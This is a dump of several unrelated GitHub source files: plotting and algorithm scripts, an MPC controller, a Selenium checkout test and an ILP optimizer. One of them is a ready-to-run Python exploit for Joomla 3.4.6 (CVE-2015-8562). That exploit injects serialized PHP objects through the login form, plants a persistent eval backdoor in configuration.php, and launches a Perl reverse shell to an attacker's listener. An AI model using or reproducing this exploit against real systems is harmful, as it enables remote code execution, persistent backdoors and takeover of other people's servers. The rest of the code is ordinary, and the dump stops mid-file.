    parameters (ID, SNP, H) and per-sequence lists (biological_var, seq_S,
    nb_homopoly, ED, DTW) plus mean/stdev of the biological variation.
    """
    output = dict()
    with open(filename, "r") as file:
        reader_csv = csv.reader(file)
        reader = [row for row in reader_csv]
    details = reader[0]
    # Sanity-check the parameter header labels before trusting the values.
    assert details[4] == "percentage of Indel"
    output["ID"] = float(details[5])
    assert details[6] == "percentage of SNP"
    output["SNP"] = float(details[7])
    assert details[8] == "proba Homopolymer extension"
    output["H"] = float(details[9])
    assert details[10] == "proba substitution sequencing"
    # NOTE(review): this scalar is overwritten by the per-row list a few
    # lines below — confirm the scalar value is really not needed.
    output["seq_S"] = float(details[11])
    assert (
        reader[1][1] == "biological_var"
        and reader[1][2] == "seq_S"
        and reader[1][3] == "seq_H"
    )
    output["biological_var"] = [int(row[1]) for row in reader[2:]]
    # stdev requires at least two records per file.
    output["mean_bio"], output["stdev_bio"] = mean(output["biological_var"]), stdev(
        output["biological_var"]
    )
    output["seq_S"] = [int(row[2]) for row in reader[2:]]
    output["nb_homopoly"] = [int(row[3]) for row in reader[2:]]
    assert reader[1][-1] == "min ED" and reader[1][-2] == "min DTW"
    output["ED"] = [int(row[-1]) for row in reader[2:]]
    output["DTW"] = [int(row[-2]) for row in reader[2:]]
    return output
def minus_bio_var(output):
    """Add 'DTW_less_bio' and 'ED_less_bio' to `output` in place: the DTW
    and ED distances with the biological variation subtracted element-wise."""
    n = len(output["DTW"])
    bio = output["biological_var"]
    output["DTW_less_bio"] = [output["DTW"][i] - bio[i] for i in range(n)]
    output["ED_less_bio"] = [output["ED"][i] - bio[i] for i in range(n)]
def avg_same_x(x, y_dict):
    """Collapse consecutive equal values of (sorted) `x` into single points.

    For each run of identical x values, the corresponding y values in every
    series of `y_dict` are averaged; the sample stdev is reported (0 for
    singleton groups).

    Bugfixes versus the previous version:
      * a spurious leading x=0 entry was emitted whenever x[0] != 0
        (misaligning unique_x with the y lists),
      * a trailing group of exactly two values was silently dropped.

    Returns (unique_x, y_mean, y_stdev).
    """
    # Group the indices of x by runs of consecutive equal values.
    unique_x = []
    groups = []
    for i, xv in enumerate(x):
        if unique_x and unique_x[-1] == xv:
            groups[-1].append(i)
        else:
            unique_x.append(xv)
            groups.append([i])
    y_mean = {k: [] for k in y_dict}
    y_stdev = {k: [] for k in y_dict}
    for k, y in y_dict.items():
        for idxs in groups:
            vals = [y[i] for i in idxs]
            y_mean[k].append(mean(vals))
            # Sample stdev is undefined for a single value; report 0.
            y_stdev[k].append(stdev(vals) if len(vals) > 1 else 0)
    return unique_x, y_mean, y_stdev
def parse_args():
    """CLI driver: argv = <basename> <fixed param: ID|H> <fixed value>.

    Globs the matching result CSVs, averages the (distance - biological
    variation) per file, plots the trend versus the varying parameter, then
    re-bins everything by homopolymer count and plots that as well.
    """
    other = {"ID": "H", "H": "ID"}
    param = {"ID": "*", "H": "*", "SNP": 0.01}
    param["basename"] = argv[1]
    tmp_parse = param["basename"].split("_")
    # basename is expected to end in "..._N_<count>"
    assert tmp_parse[-2] == "N"
    param["N"] = int(tmp_parse[-1])
    param["fixed"] = argv[2]
    assert param["fixed"] in ["ID", "H"]
    param["varying"] = other[param["fixed"]]
    param[param["fixed"]] = float(argv[3])
    # Gather values per CSV file.
    x = []
    y_mean = {"DTW": [], "ED": [], "bio": []}
    y_stdev = {"DTW": [], "ED": [], "bio": []}
    all_values = {
        "biological_var": [],
        "nb_homopoly": [],
        "ED": [],
        "DTW": [],
        "ED_less_bio": [],
        "DTW_less_bio": [],
    }
    path = f"{param['basename']}_ID_{param['ID']}_SNP_{param['SNP']}_H_{param['H']}_seqS_0.001*.csv"
    print(path)
    for name in glob(path):
        output = parse_csv(name)
        minus_bio_var(output) # subtracts the biological distance in place
        # One x point (value of the varying parameter) per file.
        x.append(output[param["varying"]])
        all_values["biological_var"] += output["biological_var"]
        all_values["nb_homopoly"] += output["nb_homopoly"]
        all_values["ED"] += output["ED"]
        all_values["DTW"] += output["DTW"]
        all_values["ED_less_bio"] += output["ED_less_bio"]
        all_values["DTW_less_bio"] += output["DTW_less_bio"]
        y_mean["DTW"].append(mean(output["DTW_less_bio"]))
        y_stdev["DTW"].append(stdev(output["DTW_less_bio"]))
        y_mean["ED"].append(mean(output["ED_less_bio"]))
        y_stdev["ED"].append(stdev(output["ED_less_bio"]))
        y_mean["bio"].append(mean(output["biological_var"]))
        y_stdev["bio"].append(stdev(output["biological_var"]))
    # reorder() receives the *unsorted* x (RHS evaluated before assignment),
    # which is exactly what it expects — it sorts the pairing itself.
    x, y_mean, y_stdev = sorted(x), reorder(x, y_mean), reorder(x, y_stdev)
    print("mean DTW: ", y_mean["DTW"])
    print("stdev DTW: ", y_stdev["DTW"])
    plot_avg_mean_stdev(param, x, y_mean, y_stdev)
    plt.figure().clear()
    # Distance/biological-distance ratios, skipping records with zero bio distance.
    print(
        f"Average ratio DTW/bio_dist: {mean([all_values['DTW'][i]/(all_values['biological_var'][i]) for i in range(len(all_values['DTW'])) if all_values['biological_var'][i] > 0])}"
    )
    print(
        f"Stdev ratio DTW/bio_dist: {stdev([all_values['DTW'][i]/(all_values['biological_var'][i]) for i in range(len(all_values['DTW'])) if all_values['biological_var'][i] > 0])}"
    )
    print(
        f"Average ratio ED/bio_dist: {mean([all_values['ED'][i]/(all_values['biological_var'][i]) for i in range(len(all_values['DTW'])) if all_values['biological_var'][i] > 0])}"
    )
    print(
        f"Stdev ratio ED/bio_dist: {stdev([all_values['ED'][i]/(all_values['biological_var'][i]) for i in range(len(all_values['DTW'])) if all_values['biological_var'][i] > 0])}"
    )
    # Second plot: same distances binned by homopolymer count.
    x = all_values["nb_homopoly"]
    all_values.pop("biological_var", None)
    all_values["DTW"] = all_values["DTW_less_bio"]
    all_values["ED"] = all_values["ED_less_bio"]
    all_values.pop("DTW_less_bio", None)
    all_values.pop("ED_less_bio", None)
    x, y = sorted(x), reorder(x, all_values)
    x, y_mean, y_stdev = avg_same_x(x, y)
    param["varying"] = "HOM"
    plot_avg_mean_stdev(param, x, y_mean, y_stdev, "_bio_var")
def simple_plot(param, x, y):
    """Plot every series of `y` against `x` and save as a PNG.

    NOTE(review): x_legend only has keys "H" and "bio", so this raises
    KeyError for param["varying"] in {"ID", "HOM"} — confirm intended use.
    """
    x_legend = {
        "H": "Number of homopolymer extension",
        "bio": f"Number of IN, DEL or SUB with repartition ",
    }
    for k in y:
        plt.plot(x, y[k], label=k)
    # plt.plot(x, [1] * len(x), color="black")
    plt.ylabel("Distance - biological variation")
    plt.xlabel(x_legend[param["varying"]])
    # plt.yscale("log")
    plt.title(
        f"Edit and dynamic time warping distance as a function\n of the number of homopolymer extensions"
    )
    plt.legend(loc="upper left")
    plt.savefig(
        f"{param['basename']}_nb_IDS_fixed_{param['fixed']}_{param[param['fixed']]}.png"
    )
def plot_avg_mean_stdev(param, x, y_mean, y_stdev, suffix=""):
    """Error-bar plot of the mean distances (with stdev) versus `x`.

    The "bio" series is collected but deliberately not drawn; the figure is
    saved as <basename>_fixed_<param>_<value><suffix>.png.
    """
    x_legend = {
        "ID": "Probability of IN, DEL or SUB error",
        "H": "$p_{hom}$",
        "HOM": "Number of character added by homopolymer extensions",
    }
    for k in y_mean:
        # plt.plot(x, y_mean[k], label=k)
        if k != "bio":
            plt.errorbar(x, y_mean[k], y_stdev[k], label=k, fmt="-o")
    plt.ylabel("Average (distance $-$ biological diversity)")
    plt.xlabel(x_legend[param["varying"]])
    # plt.title(
    #     f"Average distance for fixed {x_legend[param['fixed']]}\n equal to {param[param['fixed']]}, each point averaged over {param['N']} sequences"
    # )
    plt.legend(loc="upper left")
    plt.savefig(
        f"{param['basename']}_fixed_{param['fixed']}_{param[param['fixed']]}"
        + suffix
        + ".png"
    )
def main():
    """Entry point: parse the CLI arguments and produce the plots."""
    parse_args()
if __name__ == "__main__":
    main()
| fnareoh/DTW | src/experiments/plot.py | plot.py | py | 7,939 | python | en | code | 1 | github-code | 50 |
import sys
input = sys.stdin.readline  # fast input; deliberately shadows the builtin

# Input: n, the n monkeys' amounts, and a budget `total`.
# Find the largest cap x such that giving each monkey min(amount, x)
# stays within the budget.
n = int(input())
monkeys = list(map(int, input().split()))
sum_monkeys = sum(monkeys)
total = int(input())

if total >= sum_monkeys:
    # Everything fits, so the cap is bounded only by the largest amount.
    print(max(monkeys))
else:
    def over_check(total, monkeys, x):
        """Return True if handing out min(m, x) per monkey fits in `total`."""
        for m in monkeys:
            total -= min(m, x)
        return total >= 0

    # Binary search the boundary between feasible and infeasible caps,
    # replacing the previous linear scan (O(answer) over_check calls).
    lo = total // n     # always feasible: n * lo <= total
    hi = max(monkeys)   # infeasible here, because total < sum_monkeys
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if over_check(total, monkeys, mid):
            lo = mid
        else:
            hi = mid
    print(lo)
| mskyun721/algorithm_practice | aivle_coding_master/4271.py | 4271.py | py | 625 | python | en | code | 0 | github-code | 50 |
17438106411 | import numpy as np
# Read a 3x3 linear system row by row: three coefficients, then the RHS
# constant of each equation (prompts numbered C1..C12 as on the worksheet).
coef = np.zeros((3, 3))
rhs = np.zeros((3, 1))
for i in range(3):
    for j in range(3):
        coef[i][j] = int(input(f"Input C{i*4+j+1}: "))
    rhs[i][0] = int(input(f"Input C{(i+1)*4}: "))
print()
try:
    # np.linalg.solve is faster and numerically safer than inv() + matmul;
    # catching LinAlgError explicitly replaces the old bare `except:`,
    # which silently swallowed every unrelated error as well.
    ans = np.linalg.solve(coef, rhs)
except np.linalg.LinAlgError:
    print("Unable to find a solution")
else:
    print("Solution:")
    print(f"x ={ans[0][0]:.2f}")
    print(f"y ={ans[1][0]:.2f}")
    print(f"z ={ans[2][0]:.2f}")
| HiMAIayas/SIIT_Lab | GTS123 (Intro To ComProg)/lab10 (np linalg)/lab10_2.py | lab10_2.py | py | 456 | python | en | code | 0 | github-code | 50 |
35952217100 |
import numpy as np
from scipy import optimize

from .common import convert_orientation, compute_theta, angles_difference
class MoveMPC(object):
    """Finite-horizon MPC that tracks a reference trajectory.

    The decision vector x packs `horizon` speeds followed by `horizon`
    steering rates; scipy's SLSQP minimizes a weighted tracking cost.
    """

    def __init__(self, frame, max_speed):
        self._frame = frame
        self._horizon = 10  # number of lookahead steps
        self._dt = 0.1      # integration step [s]
        speed_bounds = [(0, max_speed) for _ in range(self._horizon)]
        steer_bounds = [(-1, 1) for _ in range(self._horizon)]
        self.bounds = np.array(
            speed_bounds + steer_bounds
        )
        # Warm-start values fed back to the optimizer on the next call.
        self.last_v0 = 0.0
        self.last_w0 = 0.0

    def __model(self, prev_pos, v, w):
        """Unicycle forward model: integrate (x, y, yaw) one step of _dt."""
        new_pos = [0.0, 0.0, 0.0]
        new_pos[0] = prev_pos[0] + v * np.cos(prev_pos[2]) * self._dt
        new_pos[1] = prev_pos[1] + v * np.sin(prev_pos[2]) * self._dt
        new_pos[2] = convert_orientation(prev_pos[2] + w * self._dt)
        return new_pos

    def __find_clothest_point(self, trajectory, pos):
        """Index of the trajectory point nearest to pos's (x, y).

        (A dead statement that re-sliced the trajectory after the argmin
        was removed; it had no effect.)
        """
        cur_pose = np.array(pos[:2])
        return int(np.linalg.norm(trajectory - cur_pose, axis=1).argmin())

    def __distance_between_poses(self, p1, p2):
        """Euclidean distance between the (x, y) parts of two poses."""
        return np.linalg.norm(np.array(p1[:2]) - np.array(p2[:2]))

    def __distance_table(self, trajectory):
        """Remaining path length from each trajectory point to the last one.

        BUGFIX: the previous version assigned into an *empty* list
        (IndexError on the first statement) and its loop read
        trajectory[index + 1] starting at the last index, one past the end.
        """
        n = trajectory.shape[0]
        table = [0.0] * n
        dist = 0.0
        for index in range(n - 2, -1, -1):
            dist += self.__distance_between_poses(trajectory[index], trajectory[index + 1])
            table[index] = dist
        return table

    def cost_function(self, x, init_pos, trajectory):
        """Weighted cost of a candidate control sequence `x`.

        x[:horizon] are speeds, x[horizon:] steering rates.  Penalizes
        control effort, control jumps, heading error, lateral error and
        the remaining distance along the reference path.
        """
        cost = 0
        # Weight coefficients (all currently 1.0).
        a_w = 1.0
        a_v = 1.0
        a_dw = 1.0
        a_dv = 1.0
        a_dtheta = 1.0
        a_l_err = 1.0
        a_s_distance = 1.0
        last_pos = init_pos
        target_traj_id = self.__find_clothest_point(trajectory, last_pos)
        distances = self.__distance_table(trajectory)
        for i in range(self._horizon):
            w = x[i + self._horizon]
            v = x[i]
            # Control-effort terms.
            cost += a_w * w * w
            cost += a_v * v * v
            cur_pos = self.__model(last_pos, v, w)
            if i != 0:
                dw = w - x[i + self._horizon - 1]
                dv = v - x[i - 1]
                # Heavily penalize steering-rate jumps above 0.1.
                if dw > 0.1:
                    cost += 1000 * a_dw * dw * dw
                else:
                    cost += a_dw * dw * dw
                cost += a_dv * dv * dv
            # Reference heading of the segment the target point lies on.
            if target_traj_id == trajectory.shape[0] - 1:
                ps = trajectory[target_traj_id - 1]
                pe = trajectory[target_traj_id]
            else:
                ps = trajectory[target_traj_id]
                pe = trajectory[target_traj_id + 1]
            theta = compute_theta(ps, pe)
            dtheta = angles_difference(theta, cur_pos[2])
            cost += a_dtheta * dtheta * dtheta
            # The target index only moves forward along the path.
            target_traj_id = max(
                self.__find_clothest_point(trajectory, cur_pos),
                target_traj_id
            )
            cost += a_s_distance * distances[target_traj_id]
            last_pos = cur_pos
            l_error = self.__distance_between_poses(cur_pos, trajectory[target_traj_id])
            cost += a_l_err * l_error * l_error
        return cost

    def execute(self, target):
        """Run one MPC step; return (v, w) or (None, None) if SLSQP fails."""
        trajectory = np.array([p[:2] for p in self._frame.get_trajectory_as_list()])
        v0 = [self.last_v0 for _ in range(self._horizon)]
        w0 = [self.last_w0 for _ in range(self._horizon)]
        x0 = np.array(v0 + w0)
        init_pos = self._frame.get_robot_pose()
        solution = optimize.minimize(self.cost_function,
                                     x0=x0,
                                     bounds=self.bounds,
                                     args=(init_pos, trajectory),
                                     method='SLSQP',
                                     tol=1e-5,
                                     options={'eps': 0.01, 'disp': False})
        if solution.success:
            # Warm-start the next call with the accepted first controls.
            self.last_v0 = solution.x[0]
            self.last_w0 = solution.x[self._horizon]
            return self.last_v0, self.last_w0
        return None, None
| kantengri/mown-project | planning/move_controller/src/move_controller/move_mpc.py | move_mpc.py | py | 4,374 | python | en | code | 3 | github-code | 50 |
71023219997 | #!/usr/bin/env python3
import requests
from bs4 import BeautifulSoup
import sys
import string
import random
import argparse
from termcolor import colored
# Proxy routing for every HTTP request; the Burp line is kept for debugging —
# the second assignment deliberately disables it.
PROXS = {'http':'127.0.0.1:8080'}
PROXS = {}
def random_string(stringLength):
    """Return a random string of `stringLength` lowercase ASCII letters."""
    alphabet = string.ascii_lowercase
    return ''.join(random.choice(alphabet) for _ in range(stringLength))
# Random parameter name so each injected backdoor is uniquely addressable.
backdoor_param = random_string(50)
def print_info(str):
print(colored("[*] " + str,"cyan"))
def print_ok(str):
print(colored("[+] "+ str,"green"))
def print_error(str):
print(colored("[-] "+ str,"red"))
def print_warning(str):
print(colored("[!!] " + str,"yellow"))
def get_token(url, cook):
token = ''
resp = requests.get(url, cookies=cook, proxies = PROXS)
html = BeautifulSoup(resp.text,'html.parser')
# csrf token is the last input
for v in html.find_all('input'):
csrf = v
csrf = csrf.get('name')
return csrf
def get_error(url, cook):
resp = requests.get(url, cookies = cook, proxies = PROXS)
if 'Failed to decode session object' in resp.text:
#print(resp.text)
return False
#print(resp.text)
return True
def get_cook(url):
resp = requests.get(url, proxies=PROXS)
#print(resp.cookies)
return resp.cookies
def gen_pay(function, command):
# Generate the payload for call_user_func('FUNCTION','COMMAND')
template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
#payload = command + ' || $a=\'http://wtf\';'
payload = 'http://l4m3rz.l337/;' + command
# Following payload will append an eval() at the enabled of the configuration file
#payload = 'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'test\\\'])) eval($_POST[\\\'test\\\']);\', FILE_APPEND) || $a=\'http://wtf\';'
function_len = len(function)
final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function)))
return final
def make_req(url , object_payload):
# just make a req with object
print_info('Getting Session Cookie ..')
cook = get_cook(url)
print_info('Getting CSRF Token ..')
csrf = get_token( url, cook)
user_payload = '\\0\\0\\0' * 9
padding = 'AAA' # It will land at this padding
working_test_obj = 's:1:"A":O:18:"PHPObjectInjection":1:{s:6:"inject";s:10:"phpinfo();";}'
clean_object = 'A";s:5:"field";s:10:"AAAAABBBBB' # working good without bad effects
inj_object = '";'
inj_object += object_payload
inj_object += 's:6:"return";s:102:' # end the object with the 'return' part
password_payload = padding + inj_object
params = {
'username': user_payload,
'password': password_payload,
'option':'com_users',
'task':'user.login',
csrf :'1'
}
print_info('Sending request ..')
resp = requests.post(url, proxies = PROXS, cookies = cook,data=params)
return resp.text
def get_backdoor_pay():
# This payload will backdoor the the configuration .PHP with an eval on POST request
function = 'assert'
template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
# payload = command + ' || $a=\'http://wtf\';'
# Following payload will append an eval() at the enabled of the configuration file
payload = 'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'' + backdoor_param +'\\\'])) eval($_POST[\\\''+backdoor_param+'\\\']);\', FILE_APPEND) || $a=\'http://wtf\';'
function_len = len(function)
final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function)))
return final
def check(url):
check_string = random_string(20)
target_url = url + 'index.php/component/users'
html = make_req(url, gen_pay('print_r',check_string))
if check_string in html:
return True
else:
return False
def ping_backdoor(url,param_name):
res = requests.post(url + '/configuration.php', data={param_name:'echo \'PWNED\';'}, proxies = PROXS)
if 'PWNED' in res.text:
return True
return False
def execute_backdoor(url, payload_code):
# Execute PHP code from the backdoor
res = requests.post(url + '/configuration.php', data={backdoor_param:payload_code}, proxies = PROXS)
print(res.text)
def exploit(url, lhost, lport):
# Exploit the target
# Default exploitation will append en eval function at the end of the configuration.pphp
# as a bacdoor. btq if you do not want this use the funcction get_pay('php_function','parameters')
# e.g. get_payload('system','rm -rf /')
# First check that the backdoor has not been already implanted
target_url = url + 'index.php/component/users'
make_req(target_url, get_backdoor_pay())
if ping_backdoor(url, backdoor_param):
print_ok('Backdoor implanted, eval your code at ' + url + '/configuration.php in a POST with ' + backdoor_param)
print_info('Now it\'s time to reverse, trying with a system + perl')
execute_backdoor(url, 'system(\'perl -e \\\'use Socket;$i="'+ lhost +'";$p='+ str(lport) +';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\\\'\');')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-t','--target',required=True,help='Joomla Target')
parser.add_argument('-c','--check', default=False, action='store_true', required=False,help='Check only')
parser.add_argument('-e','--exploit',default=False,action='store_true',help='Check and exploit')
parser.add_argument('-l','--lhost', required='--exploit' in sys.argv, help='Listener IP')
parser.add_argument('-p','--lport', required='--exploit' in sys.argv, help='Listener port')
args = vars(parser.parse_args())
url = args['target']
if(check(url)):
print_ok('Vulnerable')
if args['exploit']:
exploit(url, args['lhost'], args['lport'])
else:
print_info('Use --exploit to exploit it')
else:
print_error('Seems NOT Vulnerable ;/')
| DawnFlame/POChouse | Joomla/Joomla 3.4.6-RCE(CVE-2015-8562)/Joomla-3.4.6-RCE.py | Joomla-3.4.6-RCE.py | py | 7,410 | python | en | code | 896 | github-code | 50 |
25329146087 | from pages.CheckoutCompletePage import CheckoutCompletePage
from pages.CheckoutInformationPage import CheckoutInformationPage
from pages.CheckoutOverviewPage import CheckoutOverviewPage
from pages.YourCart import YourCart
class Test_5:
    def test_finalizar_compra(self, add_product_to_cart):
        """End-to-end checkout flow: cart -> your information -> overview -> complete."""
        products = add_product_to_cart
        products.open_cart()
        # Cart page: verify we landed on it and remember the item price for later.
        cart = YourCart(driver=products.driver)
        assert cart.is_your_cart_page(), "Your Cart page not found!"
        cart_item_price = cart.get_item_price()
        cart.click_checkout()
        # Checkout information page: fill in the buyer's details.
        information_page = CheckoutInformationPage(driver=cart.driver)
        assert information_page.is_checkout_information_page(), "Checkout: Your Information page not found!"
        information_page.insert_first_name()
        information_page.insert_last_name()
        information_page.insert_postal_code()
        information_page.click_continue()
        # Overview page: price consistency and presence of all summary sections.
        overview_page = CheckoutOverviewPage(driver=information_page.driver)
        assert overview_page.has_same_price(cart_item_price), "O valor do item não corresponde ao do carrinho!"
        assert overview_page.has_a_payment_information_title(), "titulo das informações de pagamanetos não encontrado!"
        assert overview_page.has_a_shipping_information_title(), "titulo das informações de envio não encontrado!"
        assert overview_page.has_a_price_total_title(), "titulo do preço total não encontrado!"
        assert overview_page.total_value_is_correct(), "Valor total não condiz com a soma do sub item e a taxa!"
        overview_page.click_finish_btn()
        # Completion page: confirm the order-complete messages.
        complete_page = CheckoutCompletePage(driver=overview_page.driver)
        assert complete_page.has_header_complete_msg(), 'Titulo incorreto'
        assert complete_page.has_txt_complete_msg(), 'Mensagem de texto incorreto'
| WillamsPinto/ETA-TestesDeSistema | ETA2022.1/tests/test_5.py | test_5.py | py | 1,948 | python | pt | code | 0 | github-code | 50 |
553600491 | # Definition for a Node.
class Node(object):
    """N-ary tree node (LeetCode-style definition stub)."""
    def __init__(self, val, children):
        # Payload of the node (an int for this problem).
        self.val = val
        # List of child Node objects; empty (or None) for a leaf.
        self.children = children
class Solution(object):
    def postorder(self, root):
        """
        Given an n-ary tree, return the postorder traversal of its nodes' values.

        For example, given a 3-ary tree:
        Return its postorder traversal as: [5,6,3,2,4,1].

        Note:
        Recursive solution is trivial, could you do it iteratively?

        Iterative approach ("reversed preorder"): visit each node root-first
        while pushing its children in natural order, so the RIGHTMOST child is
        popped first; the resulting root-right-...-left sequence reversed is
        exactly the left-...-right-root postorder.

        Bug fixed: the previous version pushed the bare value (node.val) back
        onto the stack and later accessed `.children` on it, raising
        AttributeError on any tree with internal nodes.

        :type root: Node
        :rtype: List[int]
        """
        if not root:
            return []
        stack = [root]
        visited = []
        while stack:
            node = stack.pop()
            visited.append(node.val)
            if node.children:
                # Natural order here means the last child is popped first.
                stack.extend(node.children)
        # Reverse the root-first traversal to obtain postorder.
        return visited[::-1]
| ljia2/leetcode.py | solutions/tree/590.N-ary.Tree.Postorder.Traversal.py | 590.N-ary.Tree.Postorder.Traversal.py | py | 939 | python | en | code | 0 | github-code | 50 |
42217001137 | from gurobi_inference import Relation_Inference
from collections import Counter
import copy
def calculate_prob(class_counts, threshold=100):
    """Normalize class counts into probabilities.

    Returns all zeros when the total count is below `threshold` (too few
    observations to trust the empirical distribution).
    """
    total = sum(class_counts)
    if total >= threshold:
        return [count / total for count in class_counts]
    return [0.0] * len(class_counts)
def define_prior_constraints(prior_dist, relation_dictionaries, label_map_rel, threshold=100):
    """Build {(event1, event2, relation_label): prior probability} constraints.

    For every event-type pair in `prior_dist`, collect the six per-relation
    counts from `relation_dictionaries`, convert them to probabilities with
    `calculate_prob` (zeros when under `threshold`), and record one entry per
    non-NONE relation label.  Pairs whose prior is all zeros are dropped.
    """
    constraints = {}
    none_idx = label_map_rel['NONE']
    for pair in prior_dist:
        if len(pair) == 0:
            continue
        event1, event2 = pair
        # One count per relation class, indexed 0..5 across the six dictionaries.
        counts = [relation_dictionaries[idx][(event1, event2)] for idx in range(6)]
        prior = calculate_prob(counts, threshold)
        if not any(prior):
            continue
        for label, idx in label_map_rel.items():
            if idx == none_idx:
                continue
            constraints[(event1, event2, label)] = prior[idx]
    return constraints
def update_constraint_parameters(constraint_param, constraint_update, relation_pred_counter,
                                 constraints, lr, tolerance, num_meet_tolerance, label_map_rel):
    """Lagrangian-relaxation style update of the per-constraint penalty weights.

    For each (event1, event2, relation) constraint, compare the target ratio in
    `constraints` with the current predicted ratio in `relation_pred_counter`.
    Constraints within `tolerance` are frozen (their flag in
    `constraint_update` is cleared); the rest move their parameter by
    lr * diff.  NOTE: `constraint_param` and `constraint_update` are mutated
    in place AND returned; the function also prints diagnostics as a side
    effect.
    """
    idx2label_rel = {v:k for k,v in label_map_rel.items()}
    diff_list = []
    # Snapshot of the parameters before this round, used only for the
    # diagnostic print below.
    prev_constraints = copy.deepcopy(constraint_param)
    for ic, ((e1, e2, r), v) in enumerate(constraint_param.items()):
        # Total predictions for this event pair across all relation classes;
        # relation_pred_counter is presumably a Counter, so missing keys count
        # as 0 — TODO confirm (a pair with zero predictions would divide by 0).
        pair_rel_sum = sum([relation_pred_counter[(e1, e2, i)] for i in range(len(label_map_rel))])
        current_ratio = relation_pred_counter[(e1, e2, r)] / pair_rel_sum
        # Positive diff: the model under-predicts this relation vs the prior.
        diff = constraints[(e1, e2, r)] - current_ratio
        diff_list.append(((e1, e2, r), diff))
        #print(e1, e2, idx2label_rel[r], relation_pred_counter[(e1, e2, r)],
        #    pair_rel_sum, current_ratio, diff)
        # Freeze a constraint the first time it lands within tolerance.
        if abs(diff) <= tolerance and constraint_update[(e1, e2, r)]:
            num_meet_tolerance += 1
            constraint_update[(e1, e2, r)] = False
        # Gradient-style step only for still-active constraints.
        if constraint_update[(e1, e2, r)]:
            constraint_param[(e1, e2, r)] += lr * diff
    print("Constraints", prev_constraints)
    print("Diff", {k: round(x, 4) for k, x in diff_list})
    print("num_meet_tolerance: %d" % num_meet_tolerance)
    return constraint_param, constraint_update, num_meet_tolerance
def LROptimization(data, sample_event_types, labels, all_pairs, event_heads, label_map_rel,
                   constraints, lr=5.0, tolerance=0.10, decay=0.9, max_iter=20):
    """Iteratively run global ILP inference and adjust constraint penalties.

    Each iteration builds a Gurobi-backed `Relation_Inference` model with the
    current penalty parameters, collects its relation predictions, and calls
    `update_constraint_parameters` to nudge the penalties toward the target
    ratios in `constraints`.  Stops early once every constraint is within
    tolerance.  Returns (preds, num_meet_tolerance) from the LAST iteration.

    NOTE(review): if max_iter == 0 the loop never runs and `preds` is
    referenced before assignment — confirm callers always pass max_iter >= 1.
    """
    # Re-key constraints from label names to label indices.
    constraints = {(k[0], k[1], label_map_rel[k[2]]):v for k,v in constraints.items()}
    constraint_param = {k: 0 for k in constraints}
    constraint_update = {k: True for k in constraints}
    num_meet_tolerance = 0
    for itr in range(max_iter):
        print("="*30, " Iteration #%s " %itr, "="*30)
        correction_count = 0
        relation_pred_counter = Counter()
        # Per-constraint [gold_count, correct_on_gold, pred_count, correct_on_pred].
        constraint_perf = {k: [0, 0, 0, 0] for k in constraints}
        # M: number of candidate samples; Mc: per-sample feature/score width —
        # presumably per-class scores, TODO confirm against Relation_Inference.
        M, Mc = data.shape
        global_model = Relation_Inference(data, constraint_param, constraints, sample_event_types,
                                          all_pairs, label_map_rel, event_heads)
        global_model.run()
        correction = global_model.predict()
        correction_count += correction
        print("Total relation corrections: %s" % correction_count)
        preds = []
        # relation global assignment
        for m in range(M):
            rel_pred = global_model.pred_rel_labels[m]
            preds.append(rel_pred)
            label = labels[m]
            sample_event_type = sample_event_types[m]
            # Samples without an event-type pair carry no constraint signal.
            if len(sample_event_type) == 0: continue
            key = sample_event_types[m]
            # merge Vague and None for ratio computation
            if rel_pred == label_map_rel['NONE']: rel_pred = 0
            if labels[m] == label_map_rel['NONE']: label = 0
            relation_pred_counter[(key[0], key[1], rel_pred)] += 1
            # Tally recall-side (gold) and precision-side (pred) hits per constraint.
            for k in constraint_perf:
                if k == (key[0], key[1], label):
                    constraint_perf[k][0] += 1
                    if rel_pred == label:
                        constraint_perf[k][1] += 1
                if k == (key[0], key[1], rel_pred):
                    constraint_perf[k][2] += 1
                    if rel_pred == label:
                        constraint_perf[k][3] += 1
        constraint_param, constraint_update, num_meet_tolerance = \
            update_constraint_parameters(constraint_param, constraint_update, relation_pred_counter,
                                         constraints, lr, tolerance, num_meet_tolerance, label_map_rel)
        #print(constraint_perf)
        # Per-constraint precision/recall/F1 (currently computed but only used
        # by the commented-out print below).
        for triplet, perf in constraint_perf.items():
            recall, precision, f1 = 0.0, 0.0, 0.0
            if perf[0] > 0: recall = perf[1] / perf[0]
            if perf[2] > 0: precision = perf[3] / perf[2]
            if recall + precision > 0.0: f1 = 2*recall*precision / (recall+precision)
            #print("(%s, %s, %s): recall: %.4f; precision: %.4f; f1: %.4f" % (triplet[0], triplet[1], triplet[2],
            #                                                                 recall, precision, f1))
        # Decay the step size each round for stability.
        lr *= decay
        if num_meet_tolerance == len(constraints): break
    return preds, num_meet_tolerance
| rujunhan/EMNLP-2020 | code/tbd/LROptimization.py | LROptimization.py | py | 5,906 | python | en | code | 6 | github-code | 50 |
16573502870 | import copy
